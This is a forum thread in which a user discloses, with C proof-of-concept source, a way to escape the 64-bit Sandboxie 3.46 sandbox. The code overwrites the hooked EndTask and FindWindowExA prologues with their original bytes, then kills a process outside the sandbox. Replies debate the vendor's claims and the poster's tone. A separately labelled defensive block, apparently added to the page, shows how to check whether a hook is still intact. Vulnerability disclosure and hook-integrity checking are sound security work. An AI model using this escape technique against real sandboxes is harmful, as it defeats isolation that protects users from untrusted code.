breakout sandboxie 3.46 x64
by Google Translate
==================================
Looking at the update notes of the official Sandboxie 3.46 release, Sandboxie shamelessly and boastfully claimed that it has perfect support for the x64 operating system, and that users on a 64-bit operating system get the same security as users on a 32-bit operating system:
"Improved support for 32-bit and 64-bit Windows Vista and Windows 7. Support for 64-bit Windows should now be on par with 32-bit Windows"
Building a perfect, fully supported defense on x64 in commercial software is a very difficult problem, so at first I could not help but praise Sandboxie.
After the praise I began to test whether it can really support defense on x64. After testing I discovered that this is not the case: Sandboxie simply cannot provide the same protection on 64-bit as on 32-bit. On 64-bit, much of Sandboxie's defense is missing or can easily be bypassed, while the same 32-bit defense is not affected.
To give a simple example: on 32-bit operating systems, for terminating a process via EndTask, Sandboxie implements protection by hooking NtRequestWaitReplyPort to intercept the RPC communication with csrss and block the termination of the process. But on 64-bit operating systems, only a ring3 API hook on EndTask is used to implement this kind of isolation, such as UI isolation.
Clearly, a program isolated in the sandbox can easily break this useless protection and, from inside the sandbox, destroy processes outside the sandbox or steal information from processes outside the sandbox.
Attached here is a test program; it needs to run on Win7 x64 Simplified Chinese (because of the hard-coded window name, etc.). When this program is started inside the sandbox on x64, it can penetrate the sandbox and terminate the calculator program outside the sandbox.
Test method: start the calculator first, then run endtask.exe sandboxed; the calculator is terminated instantly.
POC test program source code:
    #include "stdafx.h"
    #define WINNT 1
    #include <stdio.h>
    #include <tchar.h>
    #include <windows.h>
    #include <winuser.h>

    int _tmain(int argc, _TCHAR* argv[])
    {
        // The two user32 exports that the sandbox hooks inline in ring3.
        PVOID pAddr  = GetProcAddress(GetModuleHandleA("user32.dll"), "EndTask");
        PVOID pAddr2 = GetProcAddress(GetModuleHandleA("user32.dll"), "FindWindowExA");
        DWORD oldp;
        if (pAddr == NULL || pAddr2 == NULL)
        {
            printf("cannot resolve user32 exports\n");
            return 1;
        }

        // Write the original Win7 x64 prologue of EndTask (48 89 5C 24 08) back over
        // its first 5 bytes, which removes the ring3 hook. The bytes are specific to
        // this Windows build.
        VirtualProtect(pAddr, 0x5, PAGE_READWRITE, &oldp);
        *(BYTE*)pAddr = 0x48;
        *(DWORD*)((ULONGLONG)pAddr + 0x1) = 0x08245c89;
        VirtualProtect(pAddr, 0x5, oldp, &oldp);

        // Same for FindWindowExA (48 83 EC 38 ...).
        VirtualProtect(pAddr2, 0x5, PAGE_READWRITE, &oldp);
        *(BYTE*)pAddr2 = 0x48;
        *(DWORD*)((ULONGLONG)pAddr2 + 0x1) = 0x8338ec83;
        VirtualProtect(pAddr2, 0x5, oldp, &oldp);

        HWND h = FindWindowExA(0, 0, 0, "Calculator");
        if (h == 0)
        {
            printf("cannot find calc\n");
            return 1;
        }
        EndTask(h, TRUE, TRUE);
        return 0;
    }
==================================
mj0011- New Member
- Posts : 2
Join date : 2010-07-13
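As an added example (not from the post and not Sandboxie's code), here is the check a ring3 monitor would need in order to notice what this PoC does: compare the live prologue of a hooked export against both the stub it planted and the original bytes it saved before hooking. The EndTask constants are taken from the PoC above; the 0xE9 jmp stub and every function name are assumptions.

```c
/* Hook-integrity check for a ring3 inline hook (added example, not from the post).
 * Models the page's scenario: a monitor plants a 5-byte stub at the start of an
 * export, and sandboxed code writes the original prologue back over it. */
#include <stdint.h>
#include <stddef.h>
#include <string.h>

#define PATCH_LEN 5   /* the PoC rewrites exactly 5 bytes per export */

enum hook_state { HOOK_INTACT = 0, HOOK_UNHOOKED = 1, HOOK_TAMPERED = 2 };

/* Byte idx (0..4) that the PoC's two stores leave in memory: one lead byte,
 * then a DWORD stored little-endian at offset 1, as *(DWORD*)(p+1) = v does. */
uint8_t poc_patch_byte(uint8_t lead, uint32_t dword, size_t idx)
{
    if (idx == 0) return lead;
    return (uint8_t)(dword >> (8 * (idx - 1)));
}

/* Classify the live prologue of a hooked export. hook_stub is what the monitor
 * installed; orig_prologue is the untouched prologue it saved before hooking. */
enum hook_state check_hook(const uint8_t *live, const uint8_t *hook_stub,
                           const uint8_t *orig_prologue)
{
    if (memcmp(live, hook_stub, PATCH_LEN) == 0)
        return HOOK_INTACT;
    if (memcmp(live, orig_prologue, PATCH_LEN) == 0)
        return HOOK_UNHOOKED;      /* prologue restored: exactly the PoC's effect */
    return HOOK_TAMPERED;          /* anything else: a different patch or second hook */
}

/* Worked scenario using the EndTask constants from the PoC. The 0xE9 jmp rel32
 * stub is a constructed assumption; Sandboxie's real stub is not on the page. */
enum hook_state simulate_endtask_unhook(void)
{
    uint8_t orig[PATCH_LEN], live[PATCH_LEN];
    const uint8_t stub[PATCH_LEN] = { 0xE9, 0x00, 0x10, 0x00, 0x00 };
    for (size_t i = 0; i < PATCH_LEN; i++)
        orig[i] = poc_patch_byte(0x48, 0x08245c89, i);  /* 48 89 5C 24 08 */
    memcpy(live, stub, PATCH_LEN);                        /* hook in place */
    if (check_hook(live, stub, orig) != HOOK_INTACT)
        return HOOK_TAMPERED;
    memcpy(live, orig, PATCH_LEN);                        /* sandboxed code unhooks */
    return check_hook(live, stub, orig);                  /* HOOK_UNHOOKED */
}
```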
Re: breakout sandboxie 3.46 x64
Wow, thanks for that mj0011 - I'll forward that to tzuk and see what he thinks. However, let me correct/clarify a few non-technical things about Sandboxie 64-bit.
Essentially (keeping in mind that I'm replying to a piece of automatically translated text), I think you have mis-interpreted this statement:
"Support for 64-bit Windows should now be on par with 32-bit Windows"
I was wondering about what this meant exactly too, and I got it clarified here:
http://www.sandboxie.com/phpbb/viewtopic.php?p=54417#54417
As you can see, tzuk's reply is fairly clear:
"I was referring to the many, many problems reported about getting stuff to install or run properly under 64-bit Sandboxie, where the same stuff would work perfectly under 32-bit Sandboxie."
In no way does he claim that 64-bit Sandboxie is as strong against malware as 32-bit Sandboxie. Basically tzuk is referring to technical support when he states that 64-bit Sandboxie is on par with 32-bit - he is not referring to the strength of the program to perform containment/isolation.
In fact, tzuk has already admitted many times over that 64-bit Sandboxie is not as strong as 32-bit Sandboxie. It's even officially documented here:
http://www.sandboxie.com/index.php?NotesAbout64BitEdition
"The 64-bit edition of Sandboxie provides a reduced level of protection compared to the 32-bit edition of Sandboxie."
Re: breakout sandboxie 3.46 x64
Admin note
Please, in future address your comments and questions to the developer before throwing insults around here. This forum is not a "free for all" for people to insult or disparage active developers.
Guest- Guest
Re: breakout sandboxie 3.46 x64
Good point patrick. I'm giving him the benefit of the doubt (because we're reading automatically translated text, and may miss the context etc.). However, it does read like a fairly blatant insult.
Re: breakout sandboxie 3.46 x64
Yes, sometimes those translations are strange, but it seemed unnecessarily aggressive.
ssj100 wrote:Good point patrick. I'm giving him the benefit of the doubt (because we're reading automatically translated text, and may miss the context etc.). However, it does read like a fairly blatant insult.
Guest- Guest
Re: breakout sandboxie 3.46 x64
Didn't MS provide APIs to security companies to access the kernel back in 2006? Whatever happened to that?
http://www.fiercecio.com/story/microsoft-debuts-draft-patchguard-workarounds/2006-12-20
blah1234- New Member
- Posts : 1
Join date : 2011-02-09